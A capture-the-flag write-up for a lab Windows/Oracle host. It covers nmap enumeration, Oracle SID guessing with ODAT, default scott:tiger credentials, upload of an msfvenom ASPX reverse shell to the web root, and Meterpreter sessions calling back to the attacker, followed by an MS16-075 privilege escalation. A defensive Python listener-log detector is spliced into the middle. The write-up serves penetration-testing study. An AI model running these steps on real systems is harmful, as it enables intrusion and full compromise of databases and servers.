# Nmap 7.70 scan initiated Sun Jul 21 16:43:41 2019 as: nmap -sV -sC -O -A -p 80,135,139,445,1521,5985,47001 -oN O-detailed 10.10.10.82
Nmap scan report for 10.10.10.82
Host is up (0.28s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 8.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: IIS Windows Server
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1521/tcp open oracle-tns Oracle TNS listener 11.2.0.2.0 (unauthorized)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2012 (96%), Microsoft Windows Server 2012 R2 (94%), Microsoft Windows Server 2008 SP2 (93%), Microsoft Windows 7, Windows Server 2012, or Windows 8.1 Update 1 (93%), Microsoft Windows Server 2008 SP1 (93%), Microsoft Windows Vista SP1 (93%), Microsoft Windows 7 Professional SP1 (93%), Microsoft Windows 7 (92%), Microsoft Windows Server 2012 or Server 2012 R2 (92%), Microsoft Windows Server 2012 R2 Update 1 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -6m45s, deviation: 0s, median: -6m45s
| smb-security-mode:
| authentication_level: user
| challenge_response: supported
|_ message_signing: supported
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2019-07-21 16:37:20
|_ start_date: 2019-07-21 16:20:43
TRACEROUTE (using port 443/tcp)
HOP RTT ADDRESS
1 231.02 ms 10.10.14.1
2 265.03 ms 10.10.10.82
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jul 21 16:44:11 2019 -- 1 IP address (1 host up) scanned in 30.90 seconds
So there are 3 web-servers, 3 SMB ports, and 1 Oracle port. I ran gobuster on all the web-servers but found nothing, so I dropped that vector. On the SMB ports, the guest account was disabled and I had no other credentials, so I dropped that too. The only port left was the Oracle port. I found CVE-2012-1675 and its exploit, but I was not able to exploit it; either the server was not vulnerable or I had something mis-configured, so the path beyond this was manual. However, I found an Oracle Pentesting Kit on GitHub which was useful throughout the complete operation.
Find all the valid databases (SIDs) served by the listener on this server.
./odat.py sidguesser -s 10.10.10.82 -p 1521
Found XE and a few others to be valid SIDs; however, I chose to focus on XE.
Check if any default credentials work on this database.
NOTE: I checked both UPPERCASE and LOWERCASE variations, as 11g stores case-sensitive passwords by default. Found scott:tiger to be a set of valid credentials.
The next task was to check whether this account is SYSDBA or SYSOPER on this database. I used Docker to run sqlplus and check this.
docker run -e URL="scott/tiger@//10.10.10.82:1521/XE as sysdba" -ti sflyr/sqlplus
docker run -e URL="scott/tiger@//10.10.10.82:1521/XE as sysoper" -ti sflyr/sqlplus
It turns out that the user we had was a SYSDBA. One of ODAT's modules lets us put a file on the server in a directory of our choosing. As there are web-servers running, we can be confident that the directory C:\Inetpub\wwwroot exists on the system, hence I chose to upload my ASPX MSFVENOM shell there and get a reverse shell.
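From the listener's side, the SID-guessing step above is noisy: every connect request for a SID the listener does not serve is recorded in listener.log with return code 12505 (TNS-12505, "listener does not currently know of SID given in connect descriptor"), and the one guess that lands is recorded with return code 0. The following is an added example, not code from the post or from ODAT, of how a defender can pick that pattern out of listener.log: many distinct unknown SIDs from one client host in a short window, followed by a successful connect from the same host. The log lines are constructed to follow the listener.log record layout; the client addresses, hostnames and SID names in them are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of Oracle listener.log records (not taken from the original post).
# Each connection record has the shape:
#   <timestamp> * <CONNECT_DATA> * <client ADDRESS> * establish * <SID or service> * <return code>
# Return code 0 is a successful connect; 12505 is an unknown-SID failure, which the
# listener follows with a 'TNS-12505: ...' continuation line carrying no client data.
SAMPLE_LOG = """\
21-JUL-2019 16:44:58 * (CONNECT_DATA=(SID=ORCL)(CID=(PROGRAM=)(HOST=attacker)(USER=root))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.14.8)(PORT=40112)) * establish * ORCL * 12505
TNS-12505: TNS:listener does not currently know of SID given in connect descriptor
21-JUL-2019 16:44:58 * (CONNECT_DATA=(SID=PROD)(CID=(PROGRAM=)(HOST=attacker)(USER=root))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.14.8)(PORT=40113)) * establish * PROD * 12505
TNS-12505: TNS:listener does not currently know of SID given in connect descriptor
21-JUL-2019 16:44:59 * (CONNECT_DATA=(SID=TEST)(CID=(PROGRAM=)(HOST=attacker)(USER=root))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.14.8)(PORT=40114)) * establish * TEST * 12505
TNS-12505: TNS:listener does not currently know of SID given in connect descriptor
21-JUL-2019 16:44:59 * (CONNECT_DATA=(SID=DEV)(CID=(PROGRAM=)(HOST=attacker)(USER=root))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.14.8)(PORT=40115)) * establish * DEV * 12505
TNS-12505: TNS:listener does not currently know of SID given in connect descriptor
21-JUL-2019 16:45:00 * (CONNECT_DATA=(SID=ORACLE)(CID=(PROGRAM=)(HOST=attacker)(USER=root))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.14.8)(PORT=40116)) * establish * ORACLE * 12505
TNS-12505: TNS:listener does not currently know of SID given in connect descriptor
21-JUL-2019 16:45:02 * (CONNECT_DATA=(SID=XE)(CID=(PROGRAM=)(HOST=attacker)(USER=root))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.14.8)(PORT=40120)) * establish * XE * 0
21-JUL-2019 16:50:10 * (CONNECT_DATA=(SERVICE_NAME=XE)(CID=(PROGRAM=sqlplus)(HOST=appsrv01)(USER=svc_app))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.10.50)(PORT=51000)) * establish * XE * 0
"""

UNKNOWN_SID = 12505  # TNS-12505 return code

# One connection record: timestamp, requested SID/service, client host, and return code.
LINE_RE = re.compile(
    r"^(?P<ts>\d{2}-[A-Z]{3}-\d{4} \d{2}:\d{2}:\d{2}) \* "
    r"\(CONNECT_DATA=.*?\((?:SID|SERVICE_NAME)=(?P<sid>[^)]*)\).*?\) \* "
    r"\(ADDRESS=.*?\(HOST=(?P<host>[^)]+)\).*?\) \* establish \* (?P<svc>\S*) \* (?P<rc>\d+)$"
)


def parse_listener_log(text):
    """Yield (timestamp, client_host, requested_sid, return_code) per connection record.
    Continuation lines such as 'TNS-12505: ...' do not match and are skipped."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%d-%b-%Y %H:%M:%S")
        yield ts, m["host"], m["sid"], int(m["rc"])


def detect_sid_guessing(text, threshold=5, window=timedelta(seconds=60)):
    """Flag client hosts that asked for at least `threshold` distinct unknown SIDs
    within `window`. For each flagged host also list the SIDs it subsequently
    connected to successfully, i.e. the guesses that worked."""
    events = defaultdict(list)
    for ts, host, sid, rc in parse_listener_log(text):
        events[host].append((ts, sid, rc))

    findings = {}
    for host, recs in events.items():
        recs.sort()
        failures = [(ts, sid) for ts, sid, rc in recs if rc == UNKNOWN_SID]
        for i, (start, _) in enumerate(failures):
            # Distinct unknown SIDs requested in the window opening at this failure.
            in_window = {sid for t, sid in failures[i:] if t - start <= window}
            if len(in_window) >= threshold:
                findings[host] = {
                    "first_seen": start,
                    "guessed_sids": sorted(in_window),
                    "successful_sids": sorted({sid for _, sid, rc in recs if rc == 0}),
                }
                break
    return findings


if __name__ == "__main__":
    for host, info in detect_sid_guessing(SAMPLE_LOG).items():
        print(f"{host}: {len(info['guessed_sids'])} unknown SIDs from {info['first_seen']}, "
              f"then connected to {info['successful_sids'] or 'nothing'}")
```

Only the client that cycled through ORCL, PROD, TEST, DEV and ORACLE is flagged, and the report also shows that its next connect to XE succeeded; the application server that only ever connects to XE by service name is left alone. In production the same logic would run against the listener's XML log or a SIEM feed, and the threshold should be set from a baseline of how many distinct SIDs legitimate clients actually request.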
[*] Started reverse TCP handler on 10.10.14.8:9999
msf5 exploit(multi/handler) > [*] Sending stage (206403 bytes) to 10.10.10.82
[*] Meterpreter session 1 opened (10.10.14.8:9999 -> 10.10.10.82:49166) at 2019-07-21 23:03:02 +0530
msf5 exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer : SILO
OS : Windows 2012 R2 (Build 9600).
Architecture : x64
System Language : en_GB
Domain : HTB
Logged On Users : 0
Meterpreter : x64/windows
User Own
c:\Users\Phineas\Desktop>type user.txt
type user.txt
92ede***
Root Own
msf5 exploit(multi/handler) > search local_exploit_suggester
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 post/multi/recon/local_exploit_suggester normal No Multi Recon Local Exploit Suggester
msf5 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf5 post(multi/recon/local_exploit_suggester) > set SESSION 1
SESSION => 1
msf5 post(multi/recon/local_exploit_suggester) > show options
Module options (post/multi/recon/local_exploit_suggester):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION 1 yes The session to run this module on
SHOWDESCRIPTION false yes Displays a detailed description for the available exploits
msf5 post(multi/recon/local_exploit_suggester) > run
[*] 10.10.10.82 - Collecting local exploits for x64/windows...
[*] 10.10.10.82 - 11 exploit checks are being tried...
[+] 10.10.10.82 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.10.10.82 - exploit/windows/local/ms16_075_reflection_juicy: The target appears to be vulnerable.
[*] Post module execution completed
msf5 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms16_075_reflection_juicy
msf5 exploit(windows/local/ms16_075_reflection_juicy) > run
[*] Started reverse TCP handler on 10.10.14.8:4444
[*] Launching notepad to host the exploit...
[+] Process 832 launched.
[*] Reflectively injecting the exploit DLL into 832...
[*] Injecting exploit into 832...
[*] Exploit injected. Injecting exploit configuration into 832...
[*] Configuration injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (179779 bytes) to 10.10.10.82
[*] Meterpreter session 3 opened (10.10.14.8:4444 -> 10.10.10.82:49186) at 2019-07-21 23:08:45 +0530
C:\Users\Administrator\Desktop>type root.txt
type root.txt
cd39e***
Learning Outcome
Setting up MSF for Oracle pentesting sucks; ODAT was a real life-saver. Oracle pen-testing is real fun.